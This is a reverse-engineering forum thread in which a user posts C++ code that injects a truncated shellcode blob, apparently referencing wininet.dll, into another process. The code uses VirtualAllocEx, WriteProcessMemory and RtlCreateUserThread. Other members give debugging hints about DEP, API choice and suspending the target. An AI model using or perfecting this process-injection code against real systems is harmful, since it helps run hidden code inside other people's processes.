Welcome to the new Woodmann RCE Messageboards Regroupment
Please be patient while the rest of the site is restored.

To all Members of the old RCE Forums:
In order to log in, it will be necessary to reset your forum login password ("I forgot my password") using the original email address you registered with. You will be sent an email with a link to reset your password for that member account.

The old vBulletin forum was converted to phpBB format, requiring the passwords to be reset. If this is a problem for some because of a forgotten email address, please feel free to re-register with a new username. We are happy to welcome old and new members back to the forums! Thanks.

All new accounts are manually activated before you can post. Any questions can be PM'ed to Kayaker.

RtlCreateUserThread best practices

Interesting low-level stuff, operating system related issues, packer/vx acrobatics, drivers and non-newbie programming in general, including win32 assembly and whatever else.
Locked
capadleman
Junior Member
Posts: 3
Joined: Tue Jun 18, 2013 1:18 am

RtlCreateUserThread best practices

Post by capadleman »

Hi guys
I have a shell code, used VirtualAlloc with MEM_COMMIT and PAGE_EXECUTE_READWRITE, then RtlCreateUserThread
the code is executed successfully but then the process crash with C000005 excption

I read aboud DEP, but I already used PAGE_EXECUTE_READWRITE !
I also tried calling ExitThread :thinking:
How to avoid crashing the process ?
Thanks
Here is the code

Code: Select all

RtlCreateUserThread=(_RtlCreateUserThread)GetProcAddress(ntdll,"RtlCreateUserThread");
    cin >>pid;
 
    HANDLE hProc=OpenProcess(PROCESS_ALL_ACCESS,false,pid);

	HANDLE code=VirtualAllocEx(hProc, NULL, 508 ,MEM_COMMIT , PAGE_EXECUTE_READWRITE);
	void * hex =	"\xe9\xff\x00\x00\x00\xe8\x1b\x01"
"\x00\x00\x77\x69\x6e\x69\x6e\x65"
"\x74\x2e\x64\x6c\x6c\x00\xe8\x1f"....
DWORD sizeofHex = 509;
	WriteProcessMemory(hProc,code,hex,sizeofHex,NULL);
	__try {
		RtlCreateUserThread(hProc,NULL,false,0,0,0, code,0,&hThd,&cid);
	}
	__except (GetExceptionCode() ){
		return -1;
	}
    WaitForSingleObject(hThd,INFINITE);
 
    CloseHandle(hThd);
    CloseHandle(hProc);
NeOXOeN
Member
Posts: 95
Joined: Sun Feb 05, 2006 9:33 pm

Post by NeOXOeN »

We are glad to help you with your question.. :)


NeO
capadleman
Junior Member
Posts: 3
Joined: Tue Jun 18, 2013 1:18 am

Post by capadleman »

OKay I updated my question Neo :sneaky:
NeOXOeN
Member
Posts: 95
Joined: Sun Feb 05, 2006 9:33 pm

Post by NeOXOeN »

any code maybe so ppl can have look what you did wrong? i will be just a little sarcastic.. i hope you will get the point what i am saying..

I have a BOOK, it uses VirtualAlloc with MEM_COMMIT and PAGE_EXECUTE_READWRITE, then RtlCreateUserThread
the code is executed successfully but then the process crash with C000005 exception.

I read aboud DEP, but I already used PAGE_EXECUTE_READWRITE !
I also tried calling ExitThread
How to avoid crashing the process ?... hmm maybe doing it right;O


I am not trying to be mean i am just trying to help...

bye NeO
capadleman
Junior Member
Posts: 3
Joined: Tue Jun 18, 2013 1:18 am

Post by capadleman »

No problem, I'm at work now :)
so I need to get home to post the code
User avatar
Indy
Posts: 311
Joined: Sun Nov 08, 2009 4:32 am

Post by Indy »

RtlCreateUserThread() - bad api. Use kernel32, because win32(not native). It makes no sense to mix..
_genuine
Member
Posts: 78
Joined: Wed Oct 07, 2009 4:55 pm

Post by _genuine »

Theres still alot of missing information here, so let me probe a bit.
First you should know that DEP is also a mechanism that can be enforced at the hardware level, trying to execute a shellcode on the stack regardless of whether youre using VirtualAlloc or not.
Also I didnt get a chance to see exactly what the shellcode is doing, but have you suspended the target process before trying to execute the shellcode? I can see issues with the current code youre using that may cause some undefined behavior, namely at the point at which the shellcode is trying to be executed via remoteThread.
Where is the shellcode being injected? Also try adding a check to see if the call to VirtualAllocEx even succeeded, it would be a shame if it didnt right? :)
Locked